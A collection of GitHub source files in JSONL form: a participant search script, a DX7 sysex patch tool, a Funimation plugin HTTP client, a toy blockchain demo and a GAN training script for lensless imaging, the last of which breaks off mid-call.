+{"seq_id":"30651335914","text":"#A simple search program for the Writer script\n\n#imports\nimport json\nimport time\n\n#vars\nparticipant_path = \"participant_data.json\"\nuser_data = None\n\n\n#unpack the json\ndef unpack():\n global participant_path\n global user_data\n\n openobj = open(participant_path, mode='r')\n json_data = openobj.read()\n\n user_data = json.loads(json_data)\n\n\ndef get_data_discordusr(argument):\n global user_data\n\n #search for the dict entry using given argument\n for user in user_data:\n\n if not user.find(argument) and argument != \"\":\n output = user + \" : \"+ str(user_data[user])\n break\n else:\n output = \"No user with this Discord Tag\"\n \n return output \n\n\ndef get_data_mcuser(argument):\n global user_data\n\n\n for user in user_data:\n if not user_data[user][0].find(argument) and argument != \"\":\n output = user + \" : \" + str(user_data[user])\n break\n else:\n output = \"No user with this MC User\"\n\n return output\n\n\n\ndef main():\n\n unpack()\n\n argument = input(\">\")\n\n #find the command\n if not argument.find(\"discord\"):\n\n output = get_data_discordusr(argument=argument.replace(\"discord \", \"\"))\n print(output)\n\n elif not argument.find(\"mc\"):\n\n output = get_data_mcuser(argument=argument.replace(\"mc \", \"\"))\n print(output)\n\n #show everything\n elif not argument.find(\"all\"):\n global user_data\n\n for user in user_data:\n print(user + \" : \" + str(user_data[user]) + \"\\n\")\n\n elif not argument.find(\"exit\"):\n\n print(\"exiting...\")\n time.sleep(1)\n exit()\n \n else:\n\n print(\"No argument found\")\n pass\n\n main()\n\n\n#call main\nmain()","repo_name":"Christoferis/GFormsMCReader","sub_path":"Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31437136186","text":"#!/usr/bin/python\n\n# REQUIREMENTS:\n#\n# https://bitbucket.org/techtonik/hexdump/ \n# $ pip install hexdump\n#\n\nimport os\nimport sys\nimport optparse\n#import yamahadx7_syx\n#import binascii\n#import hexdump\n#import hashlib\n#from SyxType import SyxType as SyxType\nfrom EnumTypes import FileType as FileType\nfrom EnumTypes import Synth as Synth\nfrom EnumTypes import Bank as Bank\nimport PatchHunter\nimport Utils\nimport Settings\nimport Unbuffered\n#from glob import glob\n \n# DESCRIPTION HERE:\n# Takes input directory, recursively looks for ALL .syx, and extracts UNIQUE .patch files to output directory\n# Run it \n\n\n\n\n\ndef doMenu():\n if hunter.filetype == FileType.patch:\n optionLoop(getPatchMenu())\n elif hunter.filetype == FileType.sysex:\n optionLoop(getSysexMenu())\n\n\n\ndef doHexDump():\n doDump(0)\n\ndef doPrettyDump():\n doDump(1)\n\ndef doPatchDump():\n doDump(2)\n\n# Dump code:\n#\n# 0 - hex dump\n# 1 - dump all info in human readable format\n# 2 - dump only patch name(s)\n#\ndef doDump(code):\n if len(hunter) == 0:\n print (\"\\nNothing to dump...\")\n else:\n if len(hunter) == 1:\n n = 0\n else:\n while True:\n response = Utils.safe_raw_input(\"\\nEnter number (between 1 and %d, inclusive): \"%(len(hunter)))\n try:\n n = int(response) - 1\n if (n < 0) or (n >= len(hunter)):\n raise RuntimeError\n break\n except (RuntimeError, ValueError) as e:\n print (\"\\nInvalid selection!\")\n\n filename = hunter.enumerated[n][0]\n \n dump = hunter.enumerated[n][1].prettyPrint(code)\n \n print (\"\")\n print (\"--------------------------------------------------------------------------------------------------------------------------------------\")\n print (\"File: %s\\n\"%(filename))\n print (dump)\n print (\"--------------------------------------------------------------------------------------------------------------------------------------\")\n\n doMenu()\n\ndef doSearch():\n response = Utils.safe_raw_input(\"\\nEnter search string: \")\n hits = hunter.searchByName(response)\n print (\"\")\n if len(hits) > 0: \n print (\"Found hits...\\n\")\n for hit in hits:\n print (\"%s %d: %s: %s\"%(hunter.bank.name, hit[0], hit[1], hit[2]))\n else: \n print (\"No hits found...\")\n doMenu()\n \n\ndef dumpBroken():\n print (\"\\nThe following have fields whose value could not be verified for correctness:\")\n for x in hunter.getDodgy():\n # print (\"%s: %s\"%(x[1][0], x[0])\n print (\"%d: %s: %s\"%((x[0] + 1), x[1][0], [y.value for y in x[2]]))\n\ndef doExit():\n print (\"\\nExiting...\")\n exit(0)\n\ndef doRepair():\n while True:\n outputdir = Utils.safe_raw_input(\"\\nEnter output directory path: \")\n if len(outputdir) == 0:\n doMenu()\n if os.path.isdir(outputdir):\n print (\"\\nError: directory already exists!\")\n else:\n try:\n os.makedirs(outputdir)\n break\n except IOError:\n print (\"Error: could not create directory: %s\\n\"%(outputdir))\n continue\n\n if not outputdir.endswith(\"/\"):\n outputdir = outputdir + \"/\"\n \n # Repair header, checksum + end marker (but don't do anything about patch names FIXME?)\n writecount = 0\n for x in hunter.getDodgy(): # x : [index, blob, unexpected fields list]\n blob = x[1]\n try:\n f = open(\"%s%s\"%(outputdir, os.path.basename(blob[0])), \"wb\")\n print (\"Writing: %s%s\"%(outputdir, os.path.basename(blob[0])))\n f.write(blob[1].dump(True))\n f.close()\n except IOError:\n print(\"WARNING: could not write: %s%s\"%(outputdir, os.path.basename(blob[0])))\n continue\n writecount += 1\n if writecount > 0:\n 
print (\"\\nSuccessfully wrote %d file(s) to: %s ...\"%(writecount, outputdir))\n else:\n print (\"\\nDid not write any files to: %s ...\"%(outputdir))\n\n #.dump(True)\n\n doMenu()\n\n\ndef doWriteUnique():\n alreadyExists = []\n while True:\n outputdir = Utils.safe_raw_input(\"\\nEnter output directory path: \")\n if len(outputdir) == 0:\n doMenu()\n if os.path.isdir(outputdir):\n response = Utils.safe_raw_input(\"\\nWARNING: directory already exists. Continue? (y/n): \")\n if (response.upper() == 'Y'):\n alreadyExists = Utils.getAllFilenamesWithExt(outputdir, Settings.patch_file_extension)\n break \n else:\n try:\n os.makedirs(outputdir)\n break\n except IOError:\n print (\"Error: could not create directory: %s\\n\"%(outputdir))\n continue\n\n if not outputdir.endswith(\"/\"):\n outputdir = outputdir + \"/\"\n\n# PYTHON 2.x:\n writecount = 0\n for key, patch in hunter.unique_patches.iteritems():\n if \"%s.%s\"%(key, Settings.patch_file_extension) in alreadyExists:\n print (\"WARNING: %s.%s already exists! Not writing...\"%(key, Settings.patch_file_extension))\n else:\n try:\n f = open(\"%s%s.%s\"%(outputdir, key, Settings.patch_file_extension), \"wb\")\n f.write(patch.dump())\n f.close()\n except IOError:\n print(\"WARNING: could not write: %s%s.%s\"%(outputdir, key, Settings.patch_file_extension))\n continue\n writecount += 1\n if writecount > 0:\n print (\"\\nSuccessfully wrote %d .%s file(s) to: %s ...\"%(writecount, Settings.patch_file_extension, outputdir))\n else:\n print (\"\\nDid not write any .%s files to: %s ...\"%(Settings.patch_file_extension, outputdir))\n\n# PYTHON 3.x:\n# for key, value in d.items():\n\n doMenu()\n\ndef doGenSysex():\n while True:\n outputdir = Utils.safe_raw_input(\"\\nEnter output directory path: \")\n if len(outputdir) == 0:\n doMenu()\n if os.path.isdir(outputdir):\n print (\"\\nError: directory already exists!\")\n else:\n try:\n os.makedirs(outputdir)\n break\n except IOError:\n print (\"Error: could not create directory: %s\\n\"%(outputdir))\n continue\n\n if not outputdir.endswith(\"/\"):\n outputdir = outputdir + \"/\"\n\n l = hunter.genSysex()\n if len(l) > 0:\n sysex_l = l[0]\n leftover_patch_l = l[1]\n\n writecount = 0\n i = 0\n for sysex in sysex_l:\n try:\n f = open(\"%s%s%d.%s\"%(outputdir, Settings.generated_sysex_name, i, Settings.sysex_file_extension), \"wb\")\n f.write(sysex.dump())\n f.close()\n writecount += 1\n except IOError:\n print(\"WARNING: could not write: %s%s.%s\"%(outputdir, key, Settings.patch_file_extension))\n continue\n i += 1\n\n if writecount > 0:\n print (\"\\nSuccessfully wrote %d .%s file(s) to: %s\"%(writecount, Settings.sysex_file_extension, outputdir))\n else:\n print (\"\\nDid not write any .%s files to: %s\"%(Settings.sysex_file_extension, outputdir))\n\n writecount = 0\n for patch in leftover_patch_l:\n try:\n f = open(\"%s%s.%s\"%(outputdir, patch.getHash(), Settings.patch_file_extension), \"wb\")\n f.write(patch.dump())\n f.close()\n writecount += 1\n except IOError:\n print(\"WARNING: could not write: %s%s.%s\"%(outputdir, key, Settings.patch_file_extension))\n continue\n\n if writecount > 0:\n print (\"Successfully wrote %d .%s file(s) to: %s\"%(writecount, Settings.patch_file_extension, outputdir))\n else:\n print (\"Did not write any .%s files to: %s\"%(Settings.patch_file_extension, outputdir))\n\n \n\n\n doMenu()\n\ndef optionLoop(options):\n d = {}\n while True:\n i = 0\n print (\"\\nOPTIONS:\\n\")\n for option in options:\n print (\"%d: %s\"%((i + 1), option[0]))\n if len(d) < len(options):\n d[i + 
1] = option[1]\n i += 1\n response = Utils.safe_raw_input(\"\\nEnter your selection: \")\n try:\n d[int(response)]()\n break\n except (KeyError, ValueError) as e:\n print (\"\\nInvalid selection!\")\n \n\ndef getCommonMenu():\n return [[\"Get summary\", doSummary],\n [\"Pretty dump\", doPrettyDump],\n [\"Hex dump\", doHexDump],\n [\"Patch name only dump\", doPatchDump], \n [\"Patch search\", doSearch],\n [\"Dump broken (and suspect)\", dumpBroken], # \"needs attention\" list\n [\"Repair broken\", doRepair], # FIXES CHECKSUM AND HEADER... these are PARSEABLE. THE UNPARSEABLE ONES MIGHT BE A BIT TRICKY COZ FILESIZES ARENT RIGHT!!!\n [\"Exit\", doExit]] \n\n\n\ndef getSysexMenu():\n return [[\"Write all unique patches to output directory\", doWriteUnique]] + getCommonMenu()\n\n\n\ndef getPatchMenu():\n return [[\"Generate sysex\", doGenSysex]] + getCommonMenu()\n\n\ndef doSummaryWork():\n print (\"\\nTarget synth: %s\"%(synth.value))\n print (\"Target bank: %s\"%(bank.value))\n print (\"Number of .%s files found: %d\"%(filetype.value, (len(hunter) + hunter.getFailedCount() + hunter.getInvalidCount()))) \n #print (\"Bank type: %s\"%(bank.name)\n print (\"\\nFailed to open: %d\"%(hunter.getFailedCount()))\n print (\"Failed to parse: %d\"%(hunter.getInvalidCount()))\n print (\"Successfully parsed: %d\"%(len(hunter)))\n print (\"\\nPatch count: %d\"%(hunter.patch_count))\n print (\"Unique patch count: %d\"%(len(hunter.unique_patches)))\n# Broken count?\n\ndef doSummary():\n doSummaryWork()\n doMenu()\n\n\n\ndef printHelpAndExit():\n parser.print_help()\n exit(-1)\n\n#################################################################################################################\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-i\", help=\"input directory\", dest=\"inputdir\", metavar=\" \") # required\n parser.add_option(\"-b\", help=\"bank type: %s\"%(Utils.banks), dest=\"banktype\", metavar=\"\") # required\n parser.add_option(\"-f\", help=\"file type: %s\"%(Utils.filetypes), dest=\"filetype\", metavar=\"\") # required\n parser.add_option(\"-s\", help=\"synth type: %s\"%(Utils.synths), dest=\"synthtype\", metavar=\"\") # required\n parser.add_option(\"-l\", help=\"log file\", dest=\"logfile\", metavar=\"\") # optional\n # parser.add_option(\"-o\", help=\"output directory (default: ./out)\", dest=\"outputdir\", metavar=\"\")\n parser.add_option(\"-x\", help=\"don't ask (just do)\", action=\"store_true\", dest=\"dontask\", default=False)\n (opts, args) = parser.parse_args()\n\nif (opts.logfile is not None):\n if os.path.isfile(opts.logfile):\n print(\"Error: already exists: %s\\n\"%(opts.logfile))\n printHelpAndExit()\n\n try:\n unbuffered = Unbuffered.Unbuffered(opts.logfile, sys.stdin, sys.stdout)\n except IOError:\n print(\"Error: already exists: %s\\n\"%(opts.logfile))\n printHelpAndExit()\n sys.stdout = unbuffered\n sys.stdin = unbuffered\n\n\nif (opts.inputdir is None):\n print(\"Error: not specified\\n\")\n printHelpAndExit()\n\nif not os.path.isdir(opts.inputdir):\n print(\"Error: does not exist: %s\\n\"%(opts.inputdir))\n printHelpAndExit()\n\ntry:\n bank = Bank[opts.banktype]\nexcept KeyError:\n print(\"Error: invalid specified: %s\\n\"%(opts.banktype))\n printHelpAndExit() \n\ntry:\n synth = Synth[opts.synthtype]\nexcept KeyError:\n print(\"Error: invalid specified: %s\\n\"%(opts.synthtype))\n printHelpAndExit() \n\ntry:\n filetype = FileType[opts.filetype]\nexcept KeyError:\n print(\"Error: invalid specified: %s\\n\"%(opts.filetype))\n 
printHelpAndExit() \n\n#if (opts.outputdir is None):\n# opts.outputdir = \"%s/out\"%(os.getcwd())\n\nprint (\"\\nInput directory: %s\"%(opts.inputdir))\nprint (\"Synth type: %s\"%(synth.value))\nprint (\"Bank type: %s\"%(bank.value))\nprint (\"File type: %s\"%(filetype.name))\nprint (\"Target file extension: .%s\"%(filetype.value))\n#print (\"Output directory: %s\"%(opts.outputdir)\n\n#if os.path.isdir(opts.outputdir):\n# print(\"\\nWARNING: output directory exists: %s\"%(opts.outputdir))\n# print(\"... this is OK, but it is your responsibility to make sure it has not been corrupted!\\n\")\n\nif (opts.dontask is False): \n print (\"\")\n response = Utils.safe_raw_input(\"Is this correct? (y/n): \")\n if (not response.upper() == 'Y'):\n print (\"\")\n print (\"Exiting!\")\n exit(0)\n \nprint (\"\")\nprint (\"Starting...\")\n\n#################################################################################################################\n\nhunter = PatchHunter.PatchHunter(opts.inputdir, synth, bank, filetype)\ndoSummaryWork()\n\n\nwhile True:\n doMenu()\n\nexit(0)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n################################################################################################################# DEPREACTED:\n\npatch_md5 = []\n\nif os.path.isdir(opts.outputdir):\n # Recursively enumerate all existing .patch filenames below output directory, to\n # eliminate generating redundant patches\n fn_l = [y for x in os.walk(opts.outputdir) for y in glob(os.path.join(x[0], '*.%s'%(Settings.patch_file_extension)))]\n for fn in fn_l:\n #print fn\n try:\n f1 = open(fn, \"rb\")\n data = f1.read()\n f1.close()\n patch = yamahadx7_syx.Patch(data) \n patch_md5.append(patch.getHash())\n \n\n except AssertionError as e:\n print (str(e))\n print (\"WARNING: not a valid patch file: %s (skipping!)\\n\"%(fn))\n continue \n\n except IOError:\n print (\"Error: could not open: %s\\n\"%(fn))\n exit(-1)\n\nelse:\n try:\n os.makedirs(opts.outputdir)\n except IOError:\n print (\"Error: could not create output directory: %s\\n\"%(opts.outputdir))\n exit(-1)\n\nexisting_patch_count = len(patch_md5)\n\nskipped_syx_count = 0\n\n################################################################################################################# DEPREACTED:\n\n# IN directory, list of supported extensions, target synth\n# OUT list of [ [filename, syx object], ... ]\n\n# Recursively enumerate all .syx filenames below input directory\nfn_l = [y for x in os.walk(opts.inputdir) for y in glob(os.path.join(x[0], '*.%s'%(Settings.sysex_file_extension)))]\nfor fn in fn_l:\n #print fn\n try:\n f1 = open(fn, \"rb\")\n data = f1.read()\n f1.close()\n except IOError:\n print(\"Error: could not open: %s\\n\"%(fn))\n exit(-1)\n\n md5_input = hashlib.md5(data).hexdigest()\n\n try:\n syx = yamahadx7_syx.SysEx(data) # Raises AssertionError\n md5_gen = hashlib.md5(syx.dump()).hexdigest()\n \n\n if md5_input != md5_gen:\n # The way the .syx actually is on disk, and the way we regenerate it programmatically, results in different binaries!\n # Likely culprits: checksum, .. 
FIXME\n if not syx.hasValidChecksum():\n print (\"The checksum on disk is: %s\"%(binascii.hexlify(syx.raw_checksum)))\n print (\"The calculated checksum is: %s\"%((hex(syx.getChecksum())[2:]).zfill(2)))\n raise AssertionError(\".syx checksum error!\")\n\n for patch in syx:\n if patch.getHash() in patch_md5:\n #print (\"Already have a patch that matches: %s\"%(patch.get_name())\n pass\n else:\n print (\"Found new patch: %s\"%(patch.get_name()))\n patch_md5.append(patch.getHash())\n try:\n f2 = open(\"%s/%s.patch\"%(opts.outputdir, patch.getHash()), \"wb\")\n f2.write(patch.dump())\n f2.close()\n except IOError:\n print(\"Error: could not write: %s/%s.patch\\n\"%(opts.outputdir, patch.getHash()))\n exit(-1)\n\n \n\n #print (\"Success: %s\"%(fn)\n\n \n\n except AssertionError as e:\n print (str(e))\n print (\"WARNING: skipping: %s\\n\"%(fn))\n skipped_syx_count += 1\n\nnew_patch_count = len(patch_md5) - existing_patch_count\nprint (\"\\nExisting patch count: %d\"%(existing_patch_count))\nprint (\"New patch count: %d\"%(new_patch_count))\nprint (\"Number of skipped .syx files: %d\\n\"%(skipped_syx_count))\n\nexit(0)\n\n\n","repo_name":"weekend-at-bernies/sysex_utils","sub_path":"Driver1.py","file_name":"Driver1.py","file_ext":"py","file_size_in_byte":16783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70038386467","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport urllib2\nimport logging\nimport cookielib\nfrom urllib import urlencode\n\n__all__ = ['HTTPClient']\n\n\nclass HTTPClient(object):\n\n def __init__(self, base_url='', cookiefile=None, headers=None):\n super(HTTPClient, self).__init__()\n self._log = logging.getLogger('funimation')\n self.base_url = base_url\n self.cookiefile = cookiefile\n self._cookiejar = cookielib.LWPCookieJar(self.cookiefile)\n\n try:\n if self.cookiefile is not None:\n # make sure the cookie files directory exists\n if not os.path.exists(os.path.dirname(self.cookiefile)):\n os.makedirs(os.path.dirname(self.cookiefile))\n else:\n self._cookiejar.load()\n except IOError:\n # files doesn't exist yet. this is normal if the cookie was\n # cleared or it's the first time running.\n self._log.debug('cookie file \"%s\" does not exist.',\n self.cookiefile)\n\n cookie_handler = urllib2.HTTPCookieProcessor(self._cookiejar)\n self.opener = urllib2.build_opener(cookie_handler)\n\n if headers is not None:\n self.opener.addheaders = headers\n\n def get(self, url, query=None):\n if query is not None:\n if isinstance(query, dict):\n q = dict((k, v) for k, v in query.iteritems() if v is not None)\n url = url + '?' + urlencode(q)\n else:\n url = url + '?' + query\n return self._request(self._build_request(url))\n\n def post(self, url, data):\n return self._request(self._build_request(url, data))\n\n def get_cookie(self, name):\n for x in self._cookiejar:\n if x.name == name:\n return x\n return None\n\n def save_cookies(self):\n self._log.debug('Saving cookie to \"%s\"', self._cookiejar.filename)\n self._cookiejar.save()\n\n def _request(self, request):\n content = self.opener.open(request)\n if self.cookiefile:\n self.save_cookies()\n\n if content.info()['content-type'] == 'application/json':\n content = json.load(content, 'utf-8')\n else:\n content = content.read()\n\n return content\n\n def _build_request(self, url, data=None):\n if not url.startswith('http'):\n url = self.base_url + url\n if data is not None:\n if isinstance(data, dict):\n req = urllib2.Request(url, json.dumps(data),\n {'Content-Type': 'application/json'})\n else:\n req = urllib2.Request(url, data)\n else:\n req = urllib2.Request(url)\n self._log.info(req.get_full_url())\n return req\n","repo_name":"afrase/plugin.video.funimation","sub_path":"resources/lib/funimation/httpclient.py","file_name":"httpclient.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"70"}
+{"seq_id":"5966994770","text":"import okKey\n\nimport os\nimport json\nfrom datetime import datetime, timedelta\nimport base64\n\nclass okBlock(object):\n def __init__(self):\n self.previousHash = \" \"\n self.blockBody = [ {\n 'sender': \"atThe\",\n 'recipient': \"Beginning\",\n 'contents': \"LetThereBeLight\",\n 'note': \"noTransactionsOnGenesisBlock\"\n } ]\n\n def addBlock(self, preBlkHash):\n self.previousHash = preBlkHash\n blockHead = {\n 'previousHash' : preBlkHash,\n 'blockBody' : self.blockBody\n }\n notify = self.blockBody\n self.blockBody = []\n return blockHead, \\\n base64.b64encode(\n okKey.getHash(\n json.dumps(blockHead,\n ensure_ascii=False, sort_keys=True).encode())).decode()\n\n def addTransaction(self, sender, recipient, contents, note):\n transaction = {\n 'sender': sender,\n 'recipient': recipient,\n 'contents': contents,\n 'note': note\n }\n self.blockBody.append(transaction)\n return base64.b64encode(\n okKey.getHash(\n json.dumps(transaction,\n ensure_ascii=False, sort_keys=True).encode())).decode()\n\n\nclass okNode(object):\n def __init__(self):\n self.waitingList = {}\n self.blockList = []\n self.blockChain = {}\n self.myBlock = okBlock()\n self.previousBlockHash = \\\n base64.b64encode(okKey.getHash(os.urandom(64))).decode()\n self.addBlock()\n\n @property\n def block(self):\n return self.myBlock\n\n def addBlock(self):\n blockHead, currentBlockHash = self.myBlock.addBlock(self.previousBlockHash)\n self.previousBlockHash = currentBlockHash\n self.blockList.append(blockHead)\n self.blockChain[currentBlockHash] = blockHead # file mapping\n for fixedTransaction in blockHead['blockBody']:\n tID = base64.b64encode(\n okKey.getHash(\n json.dumps(fixedTransaction,\n ensure_ascii=False, sort_keys=True).encode())).decode()\n if tID in self.waitingList:\n self.waitingList[tID]['blockHash'] = currentBlockHash\n else:\n if fixedTransaction['note'] != \"noTransactionsOnGenesisBlock\":\n print('error #1004')\n return currentBlockHash\n\n def depositTransaction(self, sender, recipient, contents, note):\n tID = self.block.addTransaction(sender, recipient, contents, note)\n # print('deposit tID {0}'.format(tID))\n self.waitingList[tID] = {'sender' : sender, 'blockHash' : ' '}\n return tID\n\n def vouchHash(self, tID):\n # print('Vouch tID: {0}'.format(tID))\n # print(self.waitingList)\n if tID in self.waitingList.keys():\n if self.waitingList[tID]['blockHash'] != ' ':\n waiting = self.waitingList.pop(tID)\n return waiting['blockHash']\n else:\n return 'Not approved'\n return 'Invalid Transactiom ID'\n\n def dumpBlocks(self):\n myBlock = { \"Block Cahin\" : self.blockChain }\n return json.dumps(myBlock)\n\n def dumpList(self):\n myBlock = { \"Block List\" : self.blockList }\n return json.dumps(myBlock)\n\n def dumpWaitingList(self):\n myBlock = { \"Waiting List\" : self.waitingList }\n return json.dumps(myBlock)\n\n# error #1004 : unknown transaction on notification\n\n\nclass colleague(object):\n def __init__(self):\n self.key = okKey.getKey()\n self.ID = okKey.getPubID(self.key)\n self.waitingList = []\n self.history = {}\n\n @property\n def id(self):\n return self.ID\n\n def getDepositID(self, voucher):\n self.waitingList.append(voucher)\n\n def getVoucher(self, node):\n message = ['Not approved', 'Invalid Transactiom ID']\n for tID in self.waitingList:\n hash = node.vouchHash(tID)\n #print('voucher handler tID: {0} BlockHash: {1}'.format(tID, hash))\n if hash not in message:\n self.history[tID] = hash\n self.waitingList.remove(tID)\n\n def dumpList(self):\n wList = { 
\"Colleague ID\": self.ID,\n \"Colleague Waiting List\" : self.waitingList }\n return json.dumps(wList)\n\n def dumpHistory(self):\n hList = { \"Colleague ID\": self.ID,\n \"Transaction History\" : self.history }\n return json.dumps(hList)\n\n# error #3003 :\n\n\nif __name__ == '__main__':\n myNode = okNode()\n print(myNode.dumpBlocks())\n print(myNode.dumpList())\n\n aColleague = colleague()\n bColleague = colleague()\n cColleague = colleague()\n\n aColleague.getDepositID(myNode.depositTransaction(\n aColleague.id, bColleague.id, \"with love\", \"letter\"))\n aColleague.getDepositID(myNode.depositTransaction(\n aColleague.id, cColleague.id, \"with\", \"head\"))\n bColleague.getDepositID(myNode.depositTransaction(\n bColleague.id, cColleague.id, \"me\", \"you\"))\n print(aColleague.dumpList())\n print(bColleague.dumpList())\n print(cColleague.dumpList())\n print(myNode.dumpWaitingList())\n myNode.addBlock() # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n print(myNode.dumpBlocks())\n aColleague.getVoucher(myNode)\n bColleague.getVoucher(myNode)\n cColleague.getVoucher(myNode)\n print(aColleague.dumpHistory())\n print(bColleague.dumpHistory())\n print(cColleague.dumpHistory())\n\n cColleague.getDepositID(myNode.depositTransaction(\n cColleague.id, aColleague.id, \"from me\", \"to you\"))\n cColleague.getDepositID(myNode.depositTransaction(\n cColleague.id, bColleague.id, \"with love\", \"none\"))\n print(aColleague.dumpList())\n print(bColleague.dumpList())\n print(cColleague.dumpList())\n myNode.addBlock() # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n print(myNode.dumpBlocks())\n aColleague.getVoucher(myNode)\n bColleague.getVoucher(myNode)\n cColleague.getVoucher(myNode)\n print(aColleague.dumpHistory())\n print(bColleague.dumpHistory())\n print(cColleague.dumpHistory())\n","repo_name":"iceman67/sss","sub_path":"okCrypto/okBlock.py","file_name":"okBlock.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73965941666","text":"#!/usr/bin/env python\n# coding: utf-8\n#import GPUtil\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport math\nimport os\nimport glob\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom torchvision import utils as tvutils\nfrom PIL import Image\n\nfrom scripts import utils, models\nimport trainer, tester\n\n# ############################################\n# OPTIONS\n# ############################################\nparser = argparse.ArgumentParser()\nparser.add_argument('--debug', help='Prints debug info', action='store_true')\nparser.add_argument('--agave', help='Specify whether running on AGAVE cluser', action='store_true')\n\nparser.add_argument('--ngpu', help='Specify number of GPUs to use', type=int, default=1)\nparser.add_argument('--train_gpu', help='Specify which GPU to train on | Options: [\"0\", \"1\", \"2\", ...]', default='0')\nparser.add_argument('--test_gpu', help='Specify which GPU to test/val on | Options: [\"0\", \"1\", \"2\", ...]', default='0')\nparser.add_argument('--batch_size', help='Specify number of samples in each batch iteration', type=int, default=20)\nparser.add_argument('--num_workers', help='Specify num. of workers to load images', type=int, default=0)\nparser.add_argument('--checkpoint', help='Determine checkpoint | Options: [-2: PretrainedModel, -1: Latest, 0: Restart, n: epoch(n)', type=int, default=-2)\n\nparser.add_argument('--dataset', help='Specify Dataset | Options: [\"Synthetic-COIL20\", \"diffusercam-berkeley\", \"diffcam-mini\"]', default='diffusercam-berkeley')\nparser.add_argument('--method', help='Specify training method type | Options: [\"UNet\", \"GAN\", \"WGAN\"]', default='GAN')\nparser.add_argument('--phase', help='Specify whether to train or test model | Options: [\"train\", \"test\", \"traintest\"]', default='traintest')\nparser.add_argument('--netG', help='Define Generator Architecture | Options: [\"unet\", \"ResNet\"]', default='unet')\nparser.add_argument('--netD', help='Define Discriminator Architecture | Options: [\"basic\", \"wgan\", \"cycle\"]', default='basic')\n\nparser.add_argument('--lambda_mse', help='MSELoss weight', type=float, default=1)\nparser.add_argument('--lambda_adv', help='Adversarial Loss weight', type=float, default=0.01),\n\nparser.add_argument('--lr', help='Learning Rate', type=float, default=0.0001)\nparser.add_argument('--n_epochs', help='Number of epochs to train', type=int, default=4)\nparser.add_argument('--trainG_freq', help='How often (epochs) to train generator', type=int, default=1)\nparser.add_argument('--trainD_freq', help='How often (epochs) to train discriminator', type=int, default=1)\nparser.add_argument('--print_freq', help='How many iters til stats print', type=int, default=20)\nparser.add_argument('--plot_freq', help='How often (epochs) to display plots', type=int, default=1)\nparser.add_argument('--save_freq', help='How often (epochs) to save checkpoint/results', type=int, default=1)\nargs = parser.parse_args()\n\nif args.agave:\n DATA_DIR = '/scratch/jdrego/data/' + args.dataset + '/'\nelse:\n DATA_DIR = '/home/jdrego/PycharmProjects/DATASETS/' + args.dataset + '/'\n# Specify Checkpoint and Result Directories\nCHECKPOINT_DIR = './checkpoints/'+args.method+'/'+args.dataset+'/pretrain_adv'+str(int(args.lambda_adv*100))+'/'\nRESULTS_DIR = 
'./results/'+args.method+'/'+args.dataset+'/pretrain_adv'+str(int(args.lambda_adv*100))+'/'\n# Checks if DIR exists, if not create DIR\nutils.check_dir([CHECKPOINT_DIR, RESULTS_DIR])\n\n# Define Generator Architecture | Options: ['unet', 'ResNet']\nnet_G = args.netG #net_G = 'unet'\n# Discriminator Network Options: ['basic', 'cycle']\nnet_D = args.netD #net_D = 'basic'\n#GPUtil.showUtilization()\n# Assign GPU as device if available, else CPU\ndevice = torch.device(\"cuda:\"+args.train_gpu if (torch.cuda.is_available() and args.ngpu > 0) else \"cpu\")\nprint('Device:', device)\n#GPUtil.showUtilization()\n# ############################################\n# LOAD DATASET\n# ############################################\nif args.phase == 'train' or args.phase == 'debug_train':\n diff_loader, gt_loader, diff_val_loader, gt_val_loader = utils.load_data(DATA_DIR=DATA_DIR, batch_size=args.batch_size,\n num_workers=args.num_workers, phase=args.phase)\nelif args.phase == 'test':\n diff_test_loader, gt_test_loader = utils.load_data(DATA_DIR=DATA_DIR, batch_size=args.batch_size,\n num_workers=args.num_workers, phase=args.phase)\nelif args.phase == 'traintest':\n diff_loader, gt_loader, diff_val_loader, gt_val_loader, diff_test_loader, gt_test_loader = utils.load_data(DATA_DIR=DATA_DIR, batch_size=args.batch_size,\n num_workers=args.num_workers, phase=args.phase)\n#GPUtil.showUtilization()\n# ############################################\n# INITIALIZE/LOAD MODELS\n# ############################################\nmodel_G, model_D, opt_G, opt_D, scheduler_G, scheduler_D, losses, iter_losses, last_epoch = utils.load_models(netG=args.netG, netD=args.netD,\n chkpoint=args.checkpoint, \n learning_rate=args.lr,\n len_data=len(diff_loader.dataset),\n batch_size=args.batch_size,\n device=device, ngpu=args.ngpu,\n CHECKPOINT_DIR=CHECKPOINT_DIR)\n#GPUtil.showUtilization()\nif args.debug:\n print('GENERATOR:'); print(model_G); print('DISCRIMINATOR:'); print(model_D)\n\n\nif args.checkpoint > 0 or args.checkpoint == -1:\n utils.plot_losses(losses[:], name='epoch_loss', RESULTS_DIR=RESULTS_DIR, method=args.method)\n utils.plot_losses(iter_losses[0*len(diff_loader):], name='iter_loss', RESULTS_DIR=RESULTS_DIR, method=args.method)\n# ############################################\n# TRAIN MODEL\n# ############################################\nif args.phase == 'train' or args.phase == 'traintest' or args.phase == 'debug_train':\n model_G = trainer.train(args.method, model_G, model_D, opt_G, opt_D, scheduler_G, scheduler_D,\n diff_loader, gt_loader, diff_val_loader, gt_val_loader,\n last_epoch, args.n_epochs, args.trainG_freq, args.trainD_freq, \n args.print_freq, args.plot_freq, args.save_freq,\n args.lambda_mse, args.lambda_adv,losses, iter_losses,\n device, args.ngpu, CHECKPOINT_DIR, RESULTS_DIR)\n last_epoch += args.n_epochs\n#GPUtil.showUtilization()\n# ############################################\n# TEST MODEL\n# ############################################\nif args.phase == 'test' or args.phase == 'traintest':\n tester.test(method=args.method, model_G=model_G, model_D=model_D, 